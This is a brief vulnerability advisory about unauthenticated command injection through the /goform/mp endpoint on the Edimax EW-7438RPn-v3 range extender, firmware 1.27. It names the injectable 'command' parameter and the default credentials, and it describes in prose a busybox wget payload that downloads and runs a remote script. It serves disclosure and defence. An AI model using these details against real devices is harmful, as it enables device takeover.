Edimax EW-7438RPn Mini Remote Code Execution Vulnerability

A remote code execution vulnerability exists in the Edimax EW-7438RPn-v3 Mini Wi-Fi range extender, specifically in firmware version 1.27. This vulnerability allows unauthenticated attackers to execute arbitrary commands by sending crafted POST requests with command injection payloads to the /goform/mp endpoint. Exploitation of this vulnerability could lead to the download and execution of malicious scripts on the device.

Impact

Exploitation of this vulnerability allows for remote code execution on the affected device.

Reproduction

The vulnerability can be reproduced by sending a POST request to the /goform/mp endpoint. In 'Setup Mode', the request can be sent without authentication. In 'Unsetup Mode', the default credentials (admin:1234) must be used. The 'command' parameter can be populated with a payload that, for example, uses 'busybox wget' to download a script from a remote server and execute it.